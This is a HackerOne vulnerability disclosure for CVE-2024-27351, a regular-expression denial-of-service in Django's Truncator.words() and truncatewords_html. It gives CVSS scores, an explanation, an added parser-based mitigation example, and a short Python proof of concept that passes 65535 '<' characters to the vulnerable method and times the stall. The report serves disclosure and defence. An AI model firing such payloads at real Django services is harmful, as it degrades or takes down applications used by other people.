HackerOne report H1:2402193 (scyoon), Mar 05, 2024 - 10:53 a.m.

Internet Bug Bounty: CVE-2024-27351: Potential regular expression denial-of-service in django.utils.text.Truncator.words()

2024-03-05 10:53:54
scyoon
hackerone.com
$2580
20
regular expression
denial-of-service
truncator.words
html flag
vulnerability
server resources
performance degradation
application response time

CVSS2: 5 Medium
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: NONE
  Integrity Impact: NONE
  Availability Impact: PARTIAL
  Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P

CVSS3: 7.5 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: NONE
  Integrity Impact: NONE
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

AI Score: 9.5 High (Confidence: High)

EPSS: 0.029 Low (Percentile: 90.8%)

TL;DR

CVE-2024-27351: Potential regular expression denial-of-service in django.utils.text.Truncator.words()

Details:

django.utils.text.Truncator.words() method (with html=True) and truncatewords_html template filter were subject to a potential regular expression denial-of-service attack using a suitably crafted string (follow up to CVE-2019-14232 and CVE-2023-43665).

  • The Truncator class truncates text based on word count.
  • When the html flag is set, the internal _truncate_html() method is used.
  • This method relies on regular expressions stored in variables (re_chars and re_words) to perform the truncation.
  • These regular expressions are vulnerable to ReDoS attacks, which can cause significant performance degradation and denial-of-service.
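Django's own fix is not reproduced here. As an added example (not the project's code), the following performs the same word-count truncation of an HTML fragment on top of the stdlib html.parser tokenizer instead of a hand-written word/tag regex, which is the class of mitigation for this kind of ReDoS: the only regex applied to the text chunks, \s+, cannot backtrack, and the open-tag stack restores balanced markup after the cut. WordTruncatingParser, truncate_html_words and VOID_TAGS are names chosen for this example.

```python
import html
import re
from html.parser import HTMLParser

VOID_TAGS = {"br", "hr", "img", "input", "link", "meta", "wbr"}  # elements without a closing tag

class WordTruncatingParser(HTMLParser):
    # Keeps the first `limit` words of an HTML fragment, then closes whatever tags are still open.
    def __init__(self, limit, suffix):
        super().__init__()  # convert_charrefs=True: entities arrive decoded in handle_data
        self.limit, self.suffix, self.words, self.truncated = limit, suffix, 0, False
        self.out, self.open_tags = [], []

    def handle_starttag(self, tag, attrs):
        if self.truncated:
            return
        self.out.append(self.get_starttag_text())  # original tag text, attributes included
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.truncated or tag not in self.open_tags:
            return
        while self.open_tags:  # close children left open, then the element itself
            t = self.open_tags.pop()
            self.out.append(f"</{t}>")
            if t == tag:
                break

    def handle_data(self, data):
        if self.truncated:
            return
        kept = []
        for tok in re.split(r"(\s+)", data):  # keeps the whitespace between words; \s+ cannot backtrack
            if tok.strip():  # a word (not whitespace, not the empty string)
                if self.words == self.limit:  # word limit+1 would start here: stop
                    self.truncated = True
                    break
                self.words += 1
            kept.append(tok)
        self.out.append(html.escape("".join(kept), quote=False))  # re-escape the decoded text

    def result(self):
        text = "".join(self.out).rstrip() + self.suffix
        return text + "".join(f"</{t}>" for t in reversed(self.open_tags))

def truncate_html_words(fragment, limit, suffix="..."):
    # Returns `fragment` unchanged when it has at most `limit` words, else the truncated form.
    parser = WordTruncatingParser(limit, suffix)
    parser.feed(fragment)
    parser.close()
    return parser.result() if parser.truncated else fragment
```

Feeding it the report's payload (a constructed string of 65535 '<' characters) returns a few escaped characters plus the suffix in a fraction of a second, because every character is handled once.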

PoC:

#!/usr/bin/env python3
from django.utils.text import Truncator
import time


MAX_LENGTH = 65535

payload = '<' * MAX_LENGTH
print('[INFO] %d bytes of payload' % len(payload))

start_time = time.time()
Truncator(payload).words(3, truncate='...', html=True) # BOOM!
end_time = time.time()

print('[INFO] Truncator().words() took %lf seconds' % (end_time - start_time))

The impact of this vulnerability may vary depending on the computing environment. In my tests using an AMD Ryzen 7 3700X with 32GB RAM, I observed a notable delay of approximately 40 seconds.

Impact

An attacker could exploit this vulnerability to:

  • Consume excessive server resources, causing performance degradation and potential service outages.
  • Delay application response times significantly.
